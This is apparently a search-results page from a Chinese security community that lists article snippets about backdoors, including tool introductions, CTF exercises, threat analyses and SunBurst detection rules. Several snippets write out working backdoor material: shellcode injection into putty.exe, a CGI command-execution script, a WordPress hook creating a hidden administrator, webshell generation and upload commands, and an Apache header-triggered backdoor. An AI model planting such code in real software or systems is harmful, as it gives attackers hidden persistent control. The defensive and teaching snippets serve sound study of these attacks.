首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏鸿鹄实验室

    Durandals Backdoor简介

    Shadowinteger's Backdoor 下载地址:https://github.com/gitdurandal/dbd/releases 官方文档:https://gitbrew.org/dbd

    48230发布于 2021-04-01
  • 使用 backdoor 工具注入ShellCode

    backdoor-factory 顾名思义,直接翻译过来就是后门工厂的意思。 注入代码 接下来将使用Backdoor向Putty这个程序中注入一段ShellCode代码,需要注意的是Kali中有一个坑,其系统中自带的backdoor-factory并不能识别可执行文件,如下情况 -f:指定测试程序 -S:检查该程序是否支持注入 root@kali:~/backdoor# python backdoor.py --file=/root/putty.exe --support_check root@kali:~/backdoor# python backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded \ > -H root@kali:~/backdoor# python backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded \ > -

    1K10编辑于 2022-12-28
  • 来自专栏晨星先生的自留地

    大华摄像头backdoor,漏洞?

    想看摄像头么?我猜测会利用漏洞的你在电脑前肯定发出猥琐的笑声。没错,搞安全就是要猥琐。 和同事们出完这份报告后,大华股票没有跌,没错....因为停牌了。 而今天刚好POC可以放,就放出来耍耍吧。 摄像头的漏洞比寻常web的漏洞更刺激,因为可以做一些不可描述的事情,邪恶吧。 ------------------------------------------- 00x1 升级补丁不当 在03月06日的时候,中国浙江的一家安全摄像头/DVR制造商大华科技(Dahua Technology)针对旗下的不少产品推送

    7K31发布于 2018-06-07
  • 来自专栏漫流砂

    Nmap NSE再探-phpstudy-backdoor

    others-articles/215406.html https://paper.seebug.org/1044/ 功能介绍 此检测脚本可以通过发送特定字符检测服务器是否存在phpstudy后门 同时提供参数phpstudy-backdoor.getwebshell 来进行控制是否直接利用后门上传一个webshell 使用方法 下载lua脚本,放入Nmap的脚本文件夹内(具体可以参照上一篇文章) 检测是否存在后门 nmap 192.168.1.100 --script=phpstudy-backdoor 上传webshell nmap 192.168.1.100 --script=phpstudy-backdoor --script-args phpstudy-backdoor.getwebshell

    67420发布于 2020-08-20
  • 来自专栏Ms08067安全实验室

    安全练兵场-HackTheBox系列之Backdoor

    目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中成长,提供优质的靶场系列,模拟由外网渗透到内网攻防的真实环境。此外,同步更新最新的技术文档,攻防技巧等也是对成长的保驾护航。

    44530编辑于 2022-12-22
  • 来自专栏Urahara Blog

    Using get_defined_functions To Hidden A PHP Backdoor

    webshell隐藏是渗透当中一个很重要的权限维持技术,目前也有各种各样的隐藏方法,pen-tester的思路也越来越开放(weisuo)。这篇文章主要记录一下利用get_defined_functions()来隐藏webshell的方法,不是什么新技术,但也值得摸索。

    59420发布于 2019-12-11
  • 来自专栏Urahara Blog

    Using get_defined_functions To Hidden A PHP Backdoor

    webshell隐藏是渗透当中一个很重要的权限维持技术,目前也有各种各样的隐藏方法,pen-tester的思路也越来越开放(weisuo)。这篇文章主要记录一下利用get_defined_functions()来隐藏webshell的方法,不是什么新技术,但也值得摸索。 关于get_defined_functions()就不在这里介绍了,大家直接去翻官方文档即可,这里看一下还函数的执行结果应该也能明了。 image.png 以下是一个该函数在webshell里边利用的一个思路,主要是可以隐藏危险函数字符

    69420发布于 2018-06-07
  • 来自专栏公共互联网反网络钓鱼(APCN)

    基于Teams社交工程的A0Backdoor隐蔽渗透机制研究

    关键词:Microsoft Teams;社会工程学;A0Backdoor;DLL侧加载;DNS隧道;Quick Assist1. A0Backdoor的技术实现与持久化机制3.1 DLL侧加载技术与执行流劫持A0Backdoor的核心驻留机制采用了经典的DLL侧加载(DLL Sideloading)技术。 解密后的A0Backdoor核心例程并不会写入磁盘,而是直接重定位到新的内存区域。 A0Backdoor则采用了更为隐蔽的DNS隧道技术,且进行了针对性的变种优化。 结语A0Backdoor攻击活动的披露,再次敲响了企业网络安全的警钟。

    13310编辑于 2026-03-12
  • 来自专栏FreeBuf

    Grok-backdoor:一款支持Ngrok隧道的强大Python后门工具

    关于Grok-backdoor Grok-backdoor是一款支持Ngrok隧道的强大Python后门工具,该工具基于Python开发,使用了Ngrok隧道来实现C&C通信。 值得一提的是,当前版本的Grok-backdoor支持使用Pyinstaller生成Windows、Linux和Mac后门源码。 工具使用 在使用该工具之前,我们首先需要一个ngrok.com帐户才能使用此后门,我们可以在配置Grok-backdoor时提供Ngrok身份验证码。 在目标设备上执行了Grok-backdoor服务器后,我们将能够在Ngrok状态面板中看到创建的新的TCP隧道。 下列命令可以直接创建后门源码: python grok-backdoor.py Linux: Windows: 此时,我们将会在grok-backdoor/dist/目录中查看到输出的后门源码

    45530编辑于 2023-08-08
  • 来自专栏公共互联网反网络钓鱼(APCN)

    基于Teams社交工程与A0Backdoor的混合攻击链深度解析

    此次攻击的核心载荷被命名为A0Backdoor,其技术实现展现了极高的专业性与对抗性。 A0Backdoor的技术实现与持久化机制3.1 DLL侧加载技术与执行流劫持A0Backdoor的核心驻留机制采用了经典的DLL侧加载(DLL Sideloading)技术。 解密后的A0Backdoor核心例程并不会写入磁盘,而是直接重定位到新的内存区域。 A0Backdoor则采用了更为隐蔽的DNS隧道技术,且进行了针对性的变种优化。 结语A0Backdoor攻击活动的披露,再次敲响了企业网络安全的警钟。

    18210编辑于 2026-03-12
  • 来自专栏论文精读

    【人脸伪造检测后门攻击】 POISONED FORGERY FACE: TOWARDS BACKDOOR ATTACKS ON FACE FORGERY DET

    虽然目前在图像识别任务中有许多有效后门攻击方法,直接扩展到人脸伪造检测领域却存在着一定的问题,例如存在一些伪造人脸检测的算法(`SBI`, `Face X-ray`)是通过真实图像合并转换为负样本进行模型训练的,这种情况下会导致:**Backdoor tip] >> **backdoor 实现**:首先通过 `scalable trigger generator` 生成 trigger `translation-sensitive trigger 隐蔽性#### 2.2 Scalable Backdoor Trigger Generation(适应不同大小的面部尺寸)> Zhanhao Hu, Siyuan Huang, Xiaopei Zhu, triggers into frames.>> benchmark on the frequency based baseline, FTrojan(Wang et al., 2022a) * **backdoor 但文献缺少对于目前检测模型和backdoor更细致的研究 *Understanding the security of deepfake detection.*

    31410编辑于 2024-11-02
  • 网络安全之文件上传渗透测试

    的php一句话木马至服务器,打开控制台使用网站安全狗检测本地是否存在木马,若检测出存在木马,则将木马所在的绝对路径作为Flag值提交,若未检测出木马则提交false; 使用命令生成一句话木马并写入backdoor.php 文件 上传backdoor.php至服务器 打开靶机桌面上的网站安全狗,选择自定义路径扫描对网站进行扫描 Flag:C:/AppServ/www/Uploadfile/uploads/uploads/backdoor.php Flag值提交; 使用命令生成木马文件 Flag:weevely generate pass /backdoor.php 4.上传使用Weevely工具生成的木马backdoor1.php至服务器中,打开控制台使用网站安全狗检测本地是否存在木马 ,若检测出存在木马,则将木马所在的绝对路径作为Flag值提交,若未检测出木马则提交false; 使用命令将backdoor.php改名为backdoor1.php, 然后将backdoor1.php上传至目标服务器 因为第一次上传的一句话木马并没有清除,所以还是可以检测出木马的存在 Flag:C:/AppServ/www/Uploadfile/uploads/uploads/backdoor.php 5.通过渗透机

    37210编辑于 2025-10-23
  • 来自专栏Khan安全团队

    Powershell - 后门生成器

    too (default: 192.168.X.XX) --port PORT, -p PORT Port for the backdoor to connect over (default: connections -H, --listen-and-host Just listen for any backdoor connections BIOS信息 获取反病毒状态 获取活跃的TCP客户端 检查已安装的常见测试软件 将在当前工作目录中创建一个名为 backdoor.ps1 的文件 C:\Users\DrewQ\Desktop\powershell-backdoor-main \listen.py --verbose [*] Encoding backdoor script [*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71 USB Rubber Ducky后门 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .

    63021编辑于 2023-02-23
  • 来自专栏FreeBuf

    PBG:一款功能强大的PowerShell后门生成工具

    \listen.py --verbose [*] Encoding backdoor script [*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71 backdoor.ps1的文件。 /backdoor.ps1 (向右滑动,查看更多) 该功能已在Windows 11、Windows 10和Kali Linux上进行过测试。   Flipper Zero后门 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python . ://192.168.0.223:8989/backdoor.ps1 [*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to

    1.7K10编辑于 2023-04-09
  • 来自专栏漫流砂

    PowerShell 配置文件后门 | Windows 后门系列

    Write-Host "I am a Backdoor" 在 cmd 中输入 powershell 进入 powershell 创建 C:\Windows\System32\WindowsPowerShell \v1.0\Microsoft.PowerShell_profile.ps1 输出字符 I am the second Backdoor 在 powershell 中输入 powershell 进入新的 powershell 创建 C:\Users\Administrator\Documents\WindowsPowerShell\profile.ps1 输出 I am the third Backdoor 在第一个后门文件中额外插入powershell 代码,将 I am a Backdoor 写入到桌面的 backdoor.txt 中 先是在 cmd 中进行测试 powershell . /demo.ps1 删除 backdoor.txt 图形化右键执行 demo.ps1 也就是说这类后门对所有的 powershell 程序有效

    1.2K10编辑于 2024-01-12
  • 来自专栏XRSec.Blog

    CGI后门

    /cgi-bin/backdoor.cgi echo 'echo -e "Content-Type: text/plain\n\n"' >> . /cgi-bin/backdoor.cgi echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi chmod +x . /cgi-bin/backdoor.cgi python -m http.server --cgi wget -q -O - "http://localhost:8000/cgi-bin/backdoor.cgi

    1.9K40编辑于 2022-02-11
  • 来自专栏WordPress果酱

    WordPress 教程:如何在 WordPress 站点创建后门

    是不是在很多场合听说过后门(Backdoor),特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界 。 php add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() { if ( md5( $_GET['backdoor' username_exists( 'backdoor' ) ) { $user_id = wp_create_user( 'backdoor', 'pa55w0rd!' backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。

    1K11编辑于 2023-04-15
  • 2022年全国职业院校技能大赛“网络安全”竞赛试题文件上传渗透测试答案Flag

    DirBuster,扫描服务器80端口),通过分析扫描结果,找到上传点并使用火狐浏览器访问包含上传点的页面,并将访问成功后的页面第一行的第一个单词作为Flag值提交; Upload 3.访问成功后上传名为backdoor.php 打开控制台使用网站安全狗检测本地是否存在木马,若检测出存在木马,则将木马所在的绝对路径作为Flag值提交,若未检测出木马则提交false; c:/appserv/www/uploadfile/uploads/uploads/backdoor.php 4.通过渗透机Kali2.0对服务器场景Server9进行文件上传渗透测试,使用工具weevely在/目录下生成一个木马,木马名称为backdoor.php,密码为pass,该操作使用命令中固定不变的字符串作为 Flag值提交; weevely generate pass /backdoor.php 5.上传使用weevely生成的木马backdoor1.php至服务器中,打开控制台使用网站安全狗检测本地是否存在木马 ,若检测出存在木马,则将木马所在的绝对路径作为Flag值提交,若未检测出木马则提交false; c:/appserv/www/uploadfile/uploads/uploads/backdoor.php

    29210编辑于 2025-10-23
  • 来自专栏洛米唯熊

    Apache2之隐形后门

    0x00:简介 mod_backdoor是使用Apache2模块的隐形后门。 主要思路是在Apache2进程加载其配置后对其进行fork()处理。 当攻击者在目标服务器植入后门以后 , 一旦攻击者向服务器发送的HTTP请求存在 Backdoor这个请求头 , Backdoor 这个请求头的值作为命令执行。 将两个文件分别放入apache对应的目录位置 将mod_backdoor.so文件复制到 /usr/lib/apache2/modules/目录下 ? 将backdoor.load文件复制到 /etc/apache2/mods-available/目录下 ? 靶机执行命令: 命令一:a2enmod backdoor 命令二:systemctl restart apache2 执行完以上两个命令后让后门模块生效 2、后门测试 mac 攻击 ?

    2.3K20发布于 2020-01-13
  • 来自专栏网络安全与可视化

    如何有效地检测和阻止SunBurst恶意软件?

    alert tcp any any <> any 443 (msg:"APT.Backdoor.MSIL.SUNBURST"; content:"|16 03|"; depth:2; content:" host:"digitalcollege.org"@APT.Backdoor.MSIL.SUNBURST host:"freescanonline.com"@APT.Backdoor.MSIL.SUNBURST host:"freescanonline.com"@APT.Backdoor.MSIL.SUNBURST host:"deftsecurity.com"@APT.Backdoor.MSIL.SUNBURST host:"thedoccloud.com"@APT.Backdoor.MSIL.SUNBURST host:"virtualdataserver.com"@APT.Backdoor.MSIL.SUNBURST Detected protocols: APT.Backdoor.MSIL.SUNBURST packets: 13 bytes: 2551 flows: 1 Protocol statistics:

    1.1K30发布于 2020-12-21
领券